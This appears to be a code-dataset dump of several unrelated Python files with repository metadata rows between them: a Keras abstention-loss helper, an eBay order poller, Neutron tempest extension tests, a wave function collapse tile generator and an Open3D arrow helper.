'default': 5.0,
'help': 'factor to weight accuracy when determining new alpha scale'},
{'name': 'abs_gain',
'type': float,
'default': 1.0,
'help': 'factor to weight abstention fraction when determining new alpha scale'},
{'name': 'task_list',
'nargs': '+',
'type': int,
'help': 'list of task indices to use'},
{'name': 'task_names',
'nargs': '+',
'type': int,
'help': 'list of names corresponding to each task to use'},
]
| 31.233831 | 124 | 0.58028 | from tensorflow.keras import backend as K
abs_definitions = [
{'name': 'add_class',
'nargs': '+',
'type': int,
'help': 'flag to add abstention (per task)'},
{'name': 'alpha',
'nargs': '+',
'type': float,
'help': 'abstention penalty coefficient (per task)'},
{'name': 'min_acc',
'nargs': '+',
'type': float,
'help': 'minimum accuracy required (per task)'},
{'name': 'max_abs',
'nargs': '+',
'type': float,
'help': 'maximum abstention fraction allowed (per task)'},
{'name': 'alpha_scale_factor',
'nargs': '+',
'type': float,
'help': 'scaling factor for modifying alpha (per task)'},
{'name': 'init_abs_epoch',
'action': 'store',
'type': int,
'help': 'number of epochs to skip before modifying alpha'},
{'name': 'n_iters',
'action': 'store',
'type': int,
'help': 'number of iterations to iterate alpha'},
{'name': 'acc_gain',
'type': float,
'default': 5.0,
'help': 'factor to weight accuracy when determining new alpha scale'},
{'name': 'abs_gain',
'type': float,
'default': 1.0,
'help': 'factor to weight abstention fraction when determining new alpha scale'},
{'name': 'task_list',
'nargs': '+',
'type': int,
'help': 'list of task indices to use'},
{'name': 'task_names',
'nargs': '+',
'type': int,
'help': 'list of names corresponding to each task to use'},
]
def adjust_alpha(gParameters, X_test, truths_test, labels_val, model, alpha, add_index):
task_names = gParameters['task_names']
task_list = gParameters['task_list']
# retrieve truth-pred pair
avg_loss = 0.0
ret = []
ret_k = []
# set abstaining classifier parameters
max_abs = gParameters['max_abs']
min_acc = gParameters['min_acc']
alpha_scale_factor = gParameters['alpha_scale_factor']
# print('labels_test', labels_test)
# print('Add_index', add_index)
feature_test = X_test
# label_test = keras.utils.to_categorical(truths_test)
# loss = model.evaluate(feature_test, [label_test[0], label_test[1],label_test[2], label_test[3]])
loss = model.evaluate(feature_test, labels_val)
avg_loss = avg_loss + loss[0]
pred = model.predict(feature_test)
# print('pred',pred.shape, pred)
abs_gain = gParameters['abs_gain']
acc_gain = gParameters['acc_gain']
accs = []
abst = []
for k in range((alpha.shape[0])):
if k in task_list:
truth_test = truths_test[:, k]
alpha_k = K.eval(alpha[k])
pred_classes = pred[k].argmax(axis=-1)
# true_classes = labels_test[k].argmax(axis=-1)
true_classes = truth_test
# print('pred_classes',pred_classes.shape, pred_classes)
# print('true_classes',true_classes.shape, true_classes)
# print('labels',label_test.shape, label_test)
true = K.eval(K.sum(K.cast(K.equal(pred_classes, true_classes), 'int64')))
false = K.eval(K.sum(K.cast(K.not_equal(pred_classes, true_classes), 'int64')))
abstain = K.eval(K.sum(K.cast(K.equal(pred_classes, add_index[k] - 1), 'int64')))
print(true, false, abstain)
total = false + true
tot_pred = total - abstain
abs_acc = 0.0
abs_frac = abstain / total
if tot_pred > 0:
abs_acc = true / tot_pred
scale_k = alpha_scale_factor[k]
min_scale = scale_k
max_scale = 1. / scale_k
acc_error = abs_acc - min_acc[k]
acc_error = min(acc_error, 0.0)
abs_error = abs_frac - max_abs[k]
abs_error = max(abs_error, 0.0)
new_scale = 1.0 + acc_gain * acc_error + abs_gain * abs_error
# threshold to avoid huge swings
new_scale = min(new_scale, max_scale)
new_scale = max(new_scale, min_scale)
print('Scaling factor: ', new_scale)
K.set_value(alpha[k], new_scale * alpha_k)
print_abs_stats(task_names[k], new_scale * alpha_k, true, false, abstain, max_abs[k])
ret_k.append(truth_test)
ret_k.append(pred)
ret.append(ret_k)
accs.append(abs_acc)
abst.append(abs_frac)
else:
accs.append(1.0)
accs.append(0.0)
write_abs_stats(gParameters['output_dir'] + 'abs_stats.csv', alpha, accs, abst)
return ret, alpha
def loss_param(alpha, mask):
def loss(y_true, y_pred):
cost = 0
base_pred = (1 - mask) * y_pred
# base_true = (1 - mask) * y_true
base_true = y_true
base_cost = K.sparse_categorical_crossentropy(base_true, base_pred)
abs_pred = K.mean(mask * (y_pred), axis=-1)
# add some small value to prevent NaN when prediction is abstained
abs_pred = K.clip(abs_pred, K.epsilon(), 1. - K.epsilon())
cost = (1. - abs_pred) * base_cost - (alpha) * K.log(1. - abs_pred)
return cost
return loss
def print_abs_stats(
task_name,
alpha,
num_true,
num_false,
num_abstain,
max_abs):
# Compute interesting values
total = num_true + num_false
tot_pred = total - num_abstain
abs_frac = num_abstain / total
abs_acc = 1.0
if tot_pred > 0:
abs_acc = num_true / tot_pred
print(' task, alpha, true, false, abstain, total, tot_pred, abs_frac, max_abs, abs_acc')
print('{:>12s}, {:10.5e}, {:8d}, {:8d}, {:8d}, {:8d}, {:8d}, {:10.5f}, {:10.5f}, {:10.5f}'
.format(task_name, alpha,
num_true, num_false - num_abstain, num_abstain, total,
tot_pred, abs_frac, max_abs, abs_acc))
def write_abs_stats(stats_file, alphas, accs, abst):
# Open file for appending
abs_file = open(stats_file, 'a')
# we write all the results
for k in range((alphas.shape[0])):
abs_file.write("%10.5e," % K.get_value(alphas[k]))
for k in range((alphas.shape[0])):
abs_file.write("%10.5e," % accs[k])
for k in range((alphas.shape[0])):
abs_file.write("%10.5e," % abst[k])
abs_file.write("\n")
| 4,711 | 0 | 92 |
d7750cf5323d1a15939ac85d0efa1a3173c40f8c | 3,877 | py | Python | python/lib/python2.7/site-packages/ebaysdk-2.1.4-py2.7.egg/ebaysdk/poller/orders.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | [
"Apache-2.0"
] | 1 | 2019-12-19T01:53:13.000Z | 2019-12-19T01:53:13.000Z | python/lib/python2.7/site-packages/ebaysdk-2.1.4-py2.7.egg/ebaysdk/poller/orders.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | [
"Apache-2.0"
] | null | null | null | python/lib/python2.7/site-packages/ebaysdk-2.1.4-py2.7.egg/ebaysdk/poller/orders.py | gtfarng/Odoo_migrade | 9cc28fae4c379e407645248a29d22139925eafe7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Authored by: Tim Keefer
Licensed under CDDL 1.0
'''
from datetime import datetime, timedelta
from ebaysdk.trading import Connection as Trading
from ebaysdk.poller import parse_args, file_lock
from ebaysdk import log
if __name__ == '__main__':
(opts, args) = parse_args("usage: python -m ebaysdk.poller.orders [options]")
poller = Poller(opts, Storage())
poller.run()
| 38.386139 | 176 | 0.573381 | # -*- coding: utf-8 -*-
'''
Authored by: Tim Keefer
Licensed under CDDL 1.0
'''
from datetime import datetime, timedelta
from ebaysdk.trading import Connection as Trading
from ebaysdk.poller import parse_args, file_lock
from ebaysdk import log
class Storage(object):
def set(self, order):
data = [
("ID", order.OrderID),
("Status", order.OrderStatus),
("Seller Email", order.SellerEmail),
("Title", order.TransactionArray.Transaction[0].Item.Title),
("ItemID", order.TransactionArray.Transaction[0].Item.ItemID),
("QTY", order.TransactionArray.Transaction[0].QuantityPurchased),
("Payment Method", order.CheckoutStatus.PaymentMethod),
("Payment Date", getattr(order, 'PaidTime', 'Not Paid')),
("Total", (order.Total._currencyID + ' ' + order.Total.value))
]
if order.TransactionArray.Transaction[0].get('Variation', None):
data.append(("SKU", order.TransactionArray.Transaction[0].Variation.SKU)),
data.extend([
("Shipped Time", getattr(order, 'ShippedTime', 'Not Shipped')),
("Shipping Service", getattr(order, 'ShippingServiceSelected', 'N/A'))
])
if order.ShippingDetails.get('ShipmentTrackingDetails', None):
data.extend([
("Min Shipping Days", order.ShippingDetails.ShippingServiceOptions.ShippingTimeMin),
("Max Shipping Days", order.ShippingDetails.ShippingServiceOptions.ShippingTimeMax),
("Tracking", order.ShippingDetails.ShipmentTrackingDetails.ShipmentTrackingNumber),
("Carrier", order.ShippingDetails.ShipmentTrackingDetails.ShippingCarrierUsed),
("Cost", (order.ShippingDetails.ShippingServiceOptions.ShippingServiceCost._currencyID, order.ShippingDetails.ShippingServiceOptions.ShippingServiceCost.value))
])
values_array = map((lambda x: "%s=%s" % (x[0], x[1])), data)
log.debug(", ".join(values_array))
class Poller(object):
def __init__(self, opts, storage=None):
self.opts = opts
self.storage = storage
def run(self):
with file_lock("/tmp/.ebaysdk-poller-orders.lock"):
log.debug("Started poller %s" % __file__)
to_time = datetime.utcnow()# - timedelta(days=4)
from_time = to_time - timedelta(hours=self.opts.hours,
minutes=self.opts.minutes)
ebay_api = Trading(debug=self.opts.debug, config_file=self.opts.yaml,
appid=self.opts.appid, certid=self.opts.certid,
devid=self.opts.devid, siteid=self.opts.siteid,
warnings=False)
ebay_api.build_request('GetOrders', {
'DetailLevel': 'ReturnAll',
'OrderRole': self.opts.OrderRole,
'OrderStatus': self.opts.OrderStatus,
'Pagination': {
'EntriesPerPage': 25,
'PageNumber': 1,
},
'ModTimeFrom': from_time.strftime('%Y-%m-%dT%H:%M:%S.000Z'),
'ModTimeTo': to_time.strftime('%Y-%m-%dT%H:%M:%S.000Z'),
}, None)
for resp in ebay_api.pages():
if resp.reply.OrderArray:
for order in resp.reply.OrderArray.Order:
if self.storage:
self.storage.set(order)
else:
log.debug("storage object not defined")
else:
log.debug("no orders to process")
if __name__ == '__main__':
(opts, args) = parse_args("usage: python -m ebaysdk.poller.orders [options]")
poller = Poller(opts, Storage())
poller.run()
| 3,335 | 1 | 126 |
5b7fe67855788977661c9f99621d3e73aa41bc60 | 2,235 | py | Python | neutron_tempest_plugin/api/test_extensions.py | cloudification-io/neutron-tempest-plugin | 753ddfe205746c1cdbf94c5232096febbbf2ed22 | [
"Apache-2.0"
] | 13 | 2017-10-31T10:38:05.000Z | 2022-02-04T13:59:20.000Z | neutron_tempest_plugin/api/test_extensions.py | cloudification-io/neutron-tempest-plugin | 753ddfe205746c1cdbf94c5232096febbbf2ed22 | [
"Apache-2.0"
] | null | null | null | neutron_tempest_plugin/api/test_extensions.py | cloudification-io/neutron-tempest-plugin | 753ddfe205746c1cdbf94c5232096febbbf2ed22 | [
"Apache-2.0"
] | 8 | 2018-10-12T19:48:33.000Z | 2022-02-25T20:38:41.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import utils
from tempest import config
from tempest.lib import decorators
from neutron_tempest_plugin.api import base
CONF = config.CONF
| 39.210526 | 79 | 0.719016 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import utils
from tempest import config
from tempest.lib import decorators
from neutron_tempest_plugin.api import base
CONF = config.CONF
class ExtensionsTest(base.BaseNetworkTest):
def _test_list_extensions_includes(self, exts):
body = self.client.list_extensions()
extensions = {ext_['alias'] for ext_ in body['extensions']}
self.assertNotEmpty(extensions, "Extension list returned is empty")
for ext in exts:
ext_enabled = utils.is_extension_enabled(ext, "network")
if ext_enabled:
self.assertIn(ext, extensions)
else:
self.assertNotIn(ext, extensions)
@decorators.idempotent_id('262420b7-a4bb-4a3e-b4b5-e73bad18df8c')
def test_list_extensions_sorting(self):
self._test_list_extensions_includes(['sorting'])
@decorators.idempotent_id('19db409e-a23f-445d-8bc8-ca3d64c84706')
def test_list_extensions_pagination(self):
self._test_list_extensions_includes(['pagination'])
@decorators.idempotent_id('155b7bc2-e358-4dd8-bf3e-1774c084567f')
def test_list_extensions_project_id(self):
self._test_list_extensions_includes(['project-id'])
@decorators.idempotent_id('c7597fac-2404-45b1-beb4-523c8b1d4604')
def test_list_extensions_includes_all(self):
extensions = CONF.network_feature_enabled.api_extensions
if not extensions:
raise self.skipException("Extension list is empty")
if extensions[0] == 'all':
raise self.skipException("No lists of enabled extensions provided")
self._test_list_extensions_includes(extensions)
| 1,040 | 437 | 23 |
4b1e40615b87434b831c55952aad6964d3eadfad | 21,589 | py | Python | wfc.py | Sunnigen/pywave-function-collapse | cc8c9c23db100f27acc3c3247aa2993f596a818d | [
"MIT"
] | 2 | 2022-03-24T15:05:27.000Z | 2022-03-29T03:06:45.000Z | wfc.py | Sunnigen/pywave-function-collapse | cc8c9c23db100f27acc3c3247aa2993f596a818d | [
"MIT"
] | null | null | null | wfc.py | Sunnigen/pywave-function-collapse | cc8c9c23db100f27acc3c3247aa2993f596a818d | [
"MIT"
] | null | null | null | from collections import Counter, deque
from random import choice, randint, shuffle
from typing import Dict, Iterable, List, Tuple
import numpy as np
from utils import helper_functions
import pathfinding
import cProfile
import functools
import pstats
import tempfile
| 44.421811 | 157 | 0.573811 | from collections import Counter, deque
from random import choice, randint, shuffle
from typing import Dict, Iterable, List, Tuple
import numpy as np
from utils import helper_functions
import pathfinding
import cProfile
import functools
import pstats
import tempfile
def profile_me(func):
@functools.wraps(func)
def wraps(*args, **kwargs):
file = tempfile.mktemp()
profiler = cProfile.Profile()
profiler.runcall(func, *args, **kwargs)
profiler.dump_stats(file)
metrics = pstats.Stats(file)
metrics.strip_dirs().sort_stats('time').print_stats(100)
return wraps
class WaveFunctionCollapse:
x_max: int = 0
y_max: int = 0
tile_range: int = 0
undecided_tiles: Iterable = None
impossible_tiles: Iterable = None
matching_tile_data: Dict = None # dictionary of tile numbers and their matching tiles respective to each side
base_probability: Dict = None # dict containing tile numbers as keys and connected probabilities per each direction
tile_array: List[List[int]] = None # 2D matrix containing tile numbers stored as int
tiles_array_probabilities: np.ndarray = None # 2D Numpy Matrix of dicts of every possible tile per coordinate
lowest_entropy: Tuple[Tuple[int, int], int] = [(999, 999), 999] # coordinate point with lowest tile probability
probability_coordinate_list: Dict = None # test to find highest entropy, {val:key}
# Generation Counters
attempts: int = 0
# tile_chosen_from_weighted_probabilities: int = 0
tile_chosen_randomly: int = 0
probability_reset: int = 0
# Probability Sphere Variables
field: pathfinding.GridWithWeights = None
def __init__(self, gui, width: int, height: int) -> None:
self.x_max = width
self.y_max = height
self.gui = gui
# Subtract .1 so we can at least retain some probability data at max tile range
# self.tile_range = (width * height) // 4
self.tile_range = 10
self.tile_range += 0.1
self.undecided_tiles = deque()
self.matching_tile_data = {}
self.base_probability = {}
self.last_tile_changed = (0, 0)
self.reset_generation_data()
def reset_generation_data(self):
self.field = pathfinding.GridWithWeights(self.x_max, self.y_max)
self.tile_array = [[0 for y in range(self.y_max)] for x in range(self.x_max)] # tile names
self.tiles_array_probabilities = np.array(
[[{} for y in range(self.y_max)] for x in range(self.x_max)]) # tile probabilities
self.undecided_tiles = deque([(x, y) for y in range(self.y_max) for x in range(self.x_max)])
self.impossible_tiles = []
shuffle(self.undecided_tiles)
self.attempts = 0
# self.tile_chosen_from_weighted_probabilities = 0
self.tile_chosen_randomly = 0
self.probability_reset = 0
# Start off with a random tile
# x = (randint(0, self.x_max - 1))
# y = (randint(0, self.y_max - 1))
#
# self.lowest_entropy = [(x, y), 999]
# if self.gui.lbl_stats:
# self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (x, y, 999)
#
# self.force_weighted_placement()
def find_lowest_entropy(self):
# print('find_lowest_entropy')
"""
find_lowest_entropy calculates the lowest value depending how many
"""
# self.reset_entropy()
for x, y in self.undecided_tiles:
if self.tiles_array_probabilities[x][y]:
entropy_score = len(self.tiles_array_probabilities[x][y])
if entropy_score < self.lowest_entropy[1]:
self.lowest_entropy = [(x, y), entropy_score]
# Update Label
if self.gui.lbl_stats:
self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (self.lowest_entropy[0][0],
self.lowest_entropy[0][1],
self.lowest_entropy[1])
return
# Loop Through all Tiles and Find Lowest Entropy
for y in range(self.y_max):
for x in range(self.x_max):
if self.tiles_array_probabilities[x][y]:
# entropy_val = sum(Counter(self.tiles_array_probabilities[x][y].values()))
# print("entropy_val: ", entropy_val)
possibility_count = len(self.tiles_array_probabilities[x][y])
# print("entropy_key: ", entropy_key)
# entropy = entropy_val/entropy_key
if possibility_count < coord_score[1]:
coord_score = [(x, y), possibility_count]
# Check if Found Score is Lower than Current Selected
if coord_score[1] < self.lowest_entropy[1]:
self.lowest_entropy = coord_score
# Update Label
if self.gui.lbl_stats:
self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (self.lowest_entropy[0][0],
self.lowest_entropy[0][1],
self.lowest_entropy[1])
def force_weighted_placement(self):
# Force Placement of a Random Tile
# Needed if no collapsed tiles, to get things started
x = (randint(0, self.x_max - 1))
y = (randint(0, self.y_max - 1))
self.lowest_entropy = [(x, y), 999]
new_tile = randint(1, len(self.gui.tiles) - 1)
self.tile_array[x][y] = new_tile
self.field.walls.append((x, y))
if (x, y) in self.undecided_tiles:
self.undecided_tiles.remove((x, y))
self.reset_entropy()
self.probability_sphere(x, y, new_tile)
self.gui.place_tile(x, y)
if self.lowest_entropy[1] == 999:
self.find_lowest_entropy()
self.tiles_array_probabilities[x][y] = {}
# @profile_me
def weighted_placement(self, dt=0):
# Weighted Placement with No Backjumping
# 1. Check if There are Undecided Tiles
if not self.undecided_tiles:
self.gui.generate_iter = 0
return
# if self.lowest_entropy[1] == 999:
# self.find_lowest_entropy()
# return
# 2. Select Tile Index with Lowest Entropy
if self.lowest_entropy[1] == 999:
x, y = self.undecided_tiles.pop()
else:
x, y = self.lowest_entropy[0]
# 3. Check if Tile with Lowest Entropy Exists or Pick the Longest Lasting Undecided Tidsle
if (x, y) in self.undecided_tiles:
self.undecided_tiles.remove((x, y))
# 4. Select Tile based on Existing Probabilities else Select Random Tile
new_tile = self.new_tile_based_on_surrounding_tiles(x, y)
# 5. Update Probabilities Based on Tile Selected At Coordinate
self.reset_entropy()
if new_tile:
# print('new tile:', new_tile)
# Update Tile Arrays
# self.tile_chosen_from_weighted_probabilities += 1
self.tile_array[x][y] = new_tile
self.field.walls.append((x, y))
self.probability_sphere(x, y, new_tile)
self.gui.place_tile(x, y)
else:
if self.tile_chosen_randomly > 0:
print("UH OH RANDOM PLACEMENT MORE THAN ONCE!!!")
else:
self.force_weighted_placement()
self.tile_chosen_randomly += 1
if self.lowest_entropy[1] == 999:
self.find_lowest_entropy()
# 6. Find Lowest Entropy
# print('emptying probabilities: ', x, y)
self.tiles_array_probabilities[x][y] = {}
# if self.lowest_entropy[0] not in self.undecided_tiles or not self.tiles_array_probabilities[self.lowest_entropy[0][0]][self.lowest_entropy[0][1]]:
# self.find_lowest_entropy()
# if self.lowest_entropy[1] <= 0 and self.undecided_tiles:
# self.lowest_entropy[0] = self.undecided_tiles[0]
# 7. Finally, place Tile if Tile was Selected
# if new_tile:
# self.gui.place_tile(x, y)
# Update Generation Counter
self.gui.generate_iter -= 1
# print('number of undecided tiles: %s' % len(self.undecided_tiles))
# print('number of impossible tiles: %s' % len(self.impossible_tiles))
def probability_sphere(self, x, y, new_tile):
"""
Updates a "Sphere" (Diamond of "tile_range" size) around newly placed tile
"""
# helper_functions.super_print('Probability Sphere')
# Obtain List of Uncollapsed Tile Coordinates to Travel Through in an Orderly Fashion
start = (x, y)
came_from, cost_so_far, coordinates_travelled = \
pathfinding.breadth_first_search_with_probability(self.field, start, self.tile_range)
# Remove Existing Tile
if start in coordinates_travelled:
coordinates_travelled.remove(start)
# Update probabilities all around initial tile
# print('coordinates_traveled', coordinates_travelled,' starting at', start)
# if not coordinates_travelled:
#
for coordinate in coordinates_travelled:
i, j = coordinate
probability_list, final_tile_type = self.obtain_probabilities_list(new_tile, i, j, x, y,
coordinates_travelled.index(coordinate))
# print('updating lowest entropy:', i, j, len(probability_list), probability_list)
if probability_list:
# Set Final Probabilities
self.tiles_array_probabilities[i][j] = probability_list
# Check if Good Candidate for Next Lowest Entropy Selection
# TODO: Play with idea that entropy_score should also include distance from origination tile
entropy_score = len(probability_list)
if entropy_score <= self.lowest_entropy[1]:
self.lowest_entropy = [(i, j), entropy_score]
# print(self.lowest_entropy)
if self.gui.lbl_stats:
self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (i, j, self.lowest_entropy[1])
else:
# No Probability Found
print("\n### Impossible Tile Found at (%s, %s)###" % (i, j))
# print("tile array probabilityes: ", self.tiles_array_probabilities[i][j])
# print("coordinates_travelled: ", coordinates_travelled)
# print("last tile changed: ", self.last_tile_changed)
# self.impossible_tiles.append((i, j))
# self.undecided_tiles.remove((i, j))
# self.tiles_array_probabilities[i][j] = {}
# self.gui.continuous_generation = False
def obtain_probabilities_list(self, new_tile, i, j, x, y, iteration):
probability_tile_list = []
adjacent_tile_list = []
probability_list = []
final_tile_type = ''
direction_list = [(i + 0, j + 1, 'north'),
(i + 1, j + 0, 'east'),
(i + 0, j + (-1), 'south'),
(i + (-1), j + 0, 'west')]
shuffle(direction_list)
for _ in range(4):
px, py, direction = direction_list.pop()
# if x == px and y == py:
# no point in looking at the origin coordinate, that should aleady have a decided tile
# continue
if self.check_coordinate_within_map(px, py):
ind, op_ind = helper_functions.find_opposite(direction)
# helper_functions.super_print('Checking: %s from coordinate: (%s, %s), Iteration: %s' % (direction, i, j, iteration))
tiles_list, tile_type = self.modify_probability(new_tile, op_ind, i, j, x, y, px, py)
# tiles_list, tile_type = self.modify_probability(new_tile, op_ind, i, j, x, y, px, py)
# print('%s Tile Type: %s' % (direction, tile_type))
if tile_type == 'adjacent':
# adjacent_tile_list = set( set(adjacent_tile_list.keys()) & tiles_list)
adjacent_tile_list.append(tiles_list)
# print('Appending to Adjacent Tile List:', tiles_list)
elif tile_type == 'probability':
adjacent_tile_list.append(tiles_list)
probability_tile_list.append(tiles_list)
# print('Appending to Probability Tile List:', tiles_list)
if adjacent_tile_list:
# Keep and Combine Matches Only Between Tiles
if len(self.tiles_array_probabilities[i][j]) > 0:
adjacent_tile_list.append(self.tiles_array_probabilities[i][j])
probability_list = helper_functions.dict_intersect(adjacent_tile_list)
final_tile_type = 'adjacent'
elif probability_tile_list:
# Combine All Probabilities
if len(self.tiles_array_probabilities[i][j]) > 0:
probability_tile_list.append(self.tiles_array_probabilities[i][j])
# probability_list = helper_functions.dict_combine(probability_tile_list)
probability_list = helper_functions.dict_intersect(probability_tile_list)
final_tile_type = 'probability'
# print('Final Tile Type: %s' % final_tile_type)
# print('Final Probabilities:', probability_list)
# print('returning complete probability_list:', probability_list)
return probability_list, final_tile_type
def new_tile_based_on_surrounding_tiles(self, x, y):
# Check if Existing Coordinates have any Defined Probabilites
# Note: In a perfect world, the statement below wouldn't be needed
if len(self.tiles_array_probabilities[x][y]) < 1:
# print("No probabilities at (%s, %s)!!" % (x, y), self.tiles_array_probabilities[x][y])
# self.gui.continuous_generation = False
# import sys
# sys.exit()
return None
# Select New Tile from Possible tiles from surrounding tiles
return self.check_match(self.tiles_array_probabilities[x][y].keys(), x, y)
# return self.check_match(helper_functions.weighted_choice(self.tiles_array_probabilities[x][y]), x, y)
def check_match(self, available_tiles, x, y):
possible_list = [] # List of (4) lists of probabilities from all (4) directions
# Obtain All Possible Probabilities from All (4) Directions based on New Tile
for px, py, direction in [(x + 0, y + 1, 'north'),
(x + 1, y + 0, 'east'),
(x + 0, y + (-1), 'south'),
(x + (-1), y + 0, 'west')
]:
ind, op_ind = helper_functions.find_opposite(direction)
if self.check_coordinate_within_map(px, py): # check within map
if self.tile_array[px][py] != 0: # check for non-placeholder tile
possible_list.append(self.matching_tile_data[self.tile_array[px][py]][op_ind])
# Return Impossible if New Tile isn't in the Matching List
# print("match_list:", possible_list)
# tiles_to_choose = list(set(available_tiles) &
intersection = available_tiles
for m in possible_list:
# print(type(m))
intersection = intersection & set(m)
if not intersection:
print("Contradiction at (%s, %s)!" % (x, y))
print("possible_list: ", possible_list)
print("available_tiles: ", available_tiles)
return None
# New Tile is a Good Match
self.last_tile_changed = (x, y)
# print("last tile changed: ", self.last_tile_changed)
return choice(list(intersection))
# def check_match(self, new_tile, x, y):
# match_list = [] # List of (4) lists of probabilities from all (4) directions
#
# # Obtain All Possible Probabilities from All (4) Directions based on New Tile
# for px, py, direction in [(x + 0, y + 1, 'north'),
# (x + 1, y + 0, 'east'),
# (x + 0, y + (-1), 'south'),
# (x + (-1), y + 0, 'west')
# ]:
# ind, op_ind = helper_functions.find_opposite(direction)
#
# if self.check_coordinate_within_map(px, py): # check within map
# if self.tile_array[px][py] != 0: # check for non-placeholder tile
# match_list.append(self.matching_tile_data[self.tile_array[px][py]][op_ind])
#
# # Return Impossible if New Tile isn't in the Matching List
#
# for m in match_list:
# if new_tile not in m:
# # New Tile Does Not Match Surroundings!
# print("# New Tile: %s at (%s, %s) Does Not Match Surroundings!" % (new_tile, x, y))
# print("match_list: ", match_list)
# return None
# # New Tile is a Good Match
# self.last_tile_changed = (x, y)
# # print("last tile changed: ", self.last_tile_changed)
# return new_tile
# @profile_me
def modify_probability(self, new_tile, op_index, i, j, x, y, px, py):
# Modify Probability at Given Coordinate
# print('\nModify Probability at (%s, %s) from (%s, %s), from origin: (%s, %s)' % (i, j, px, py, x, y))
# TODO: return if base_probability_value < 1
# Obtain Probabilities from Previous Tiles and Propagate
modified_probabilities = Counter({})
probability_value = 1
# probability_value = helper_functions.determine_probability_value(i, j, x, y, self.tile_range)
# if probability_value <= 0:
# print("probability ")
# return {}, ''
# Search for Adjacent Tile
if self.tile_array[px][py] != 0:
# print('tile already exists, using actual tile:', self.tile_array[px][py])
tile_type = 'adjacent'
# print("self.matching_tile_data[self.tile_array[px][py]][op_index]: ", self.matching_tile_data[self.tile_array[px][py]][op_index] )
modified_probabilities = {tile: 1 for tile in self.matching_tile_data[self.tile_array[px][py]][op_index]}
# for tile in self.matching_tile_data[self.tile_array[px][py]][op_index]:
# base_probability = 1
# base_probability = self.base_probability[tile][op_index]
# tiles_to_check[tile] = 1
# tiles_to_check[tile] = round(probability_value * base_probability * percentage * 2.5, 2)
else:
# Search for Adjacent Probabilities
if not self.tiles_array_probabilities[px][py] or probability_value <= 0:
# print('No nearby tiles, probabilities to choose from or probability value is <= 0')
return {}, '' # nothing to return
tile_type = 'probability'
# print('tile does not exist yet, extending from probabilities')
modified_probabilities = {possible_tile: 1 for key in self.tiles_array_probabilities[px][py].keys()
for possible_tile in self.matching_tile_data[key][op_index]}
# base_probability = self.base_probability[possible_tile][op_index]
# tiles_to_check[possible_tile] = round(probability_value * base_probability * percentage, 2)
# Find Top Probability Values
# modified_probabilities = tiles_to_check
return modified_probabilities, tile_type
def check_decided_neighbors(self, x, y):
# Check if Surrounding Coordinates are Undecided
for new_x, new_y in [(x, y + 1), (x, y - 1), (x + 1, y), (x - 1, y)]:
# Check if Neighbor is Already observed(collapsed)
if not (new_x, new_y) in self.undecided_tiles:
if self.check_coordinate_within_map(new_x, new_y):
return False # At least (1) tile neighbor has been decided
return True # All neighbors are undecided
def check_coordinate_within_map(self, x, y):
# (x, y) Must be Within Map
# print('(%s, %s) Must be Within Map (%s, %s)' % (x, y, self.x_max-1, self.y_max-1))
if 0 <= x <= self.x_max - 1 and 0 <= y <= self.y_max - 1:
# print(((x, y), 'is within map.'))
return True
return False
def reset_entropy(self) -> None:
# print('reset_entropy')
# Reset to Default Value
self.lowest_entropy = [(999, 999), 999]
if self.gui.lbl_stats:
self.gui.lbl_stats.text = 'Lowest Entropy|(%s, %s): %s' % (999, 999, 999)
| 13,736 | 7,518 | 49 |
7ae4b70795a408a9283f1cf36ea2d333aeba46c1 | 3,456 | py | Python | tools/visual_tools/open3d_arrow.py | AbangLZU/OpenPCDet | eeea3f24d392f692228c1ad4e28c0dc9d0e25665 | [
"Apache-2.0"
] | 29 | 2021-07-16T07:35:46.000Z | 2022-03-28T07:43:45.000Z | tools/visual_tools/open3d_arrow.py | AbangLZU/OpenPCDet | eeea3f24d392f692228c1ad4e28c0dc9d0e25665 | [
"Apache-2.0"
] | 1 | 2021-09-26T06:19:56.000Z | 2021-09-26T06:19:56.000Z | tools/visual_tools/open3d_arrow.py | AbangLZU/OpenPCDet | eeea3f24d392f692228c1ad4e28c0dc9d0e25665 | [
"Apache-2.0"
] | 12 | 2021-07-16T12:01:31.000Z | 2022-03-24T07:27:30.000Z | import open3d as o3d
import numpy as np
# def draw_geometries(pcds):
# """
# Draw Geometries
# Args:
# - pcds (): [pcd1,pcd2,...]
# """
# o3d.visualization.draw_geometries(pcds)
# def get_o3d_FOR(origin=[0, 0, 0], size=10):
# """
# Create a FOR that can be added to the open3d point cloud
# """
# mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=size)
# mesh_frame.translate(origin)
# return mesh_frame
def vector_magnitude(vec):
"""
Calculates a vector's magnitude.
Args:
- vec ():
"""
magnitude = np.sqrt(np.sum(vec ** 2))
return magnitude
def calculate_zy_rotation_for_arrow(vec):
"""
Calculates the rotations required to go from the vector vec to the
z axis vector of the original FOR. The first rotation that is
calculated is over the z axis. This will leave the vector vec on the
XZ plane. Then, the rotation over the y axis.
Returns the angles of rotation over axis z and y required to
get the vector vec into the same orientation as axis z
of the original FOR
Args:
- vec ():
"""
# Rotation over z axis of the FOR
gamma = np.arctan(vec[1] / vec[0])
Rz = np.array(
[
[np.cos(gamma), -np.sin(gamma), 0],
[np.sin(gamma), np.cos(gamma), 0],
[0, 0, 1],
]
)
# Rotate vec to calculate next rotation
vec = Rz.T @ vec.reshape(-1, 1)
vec = vec.reshape(-1)
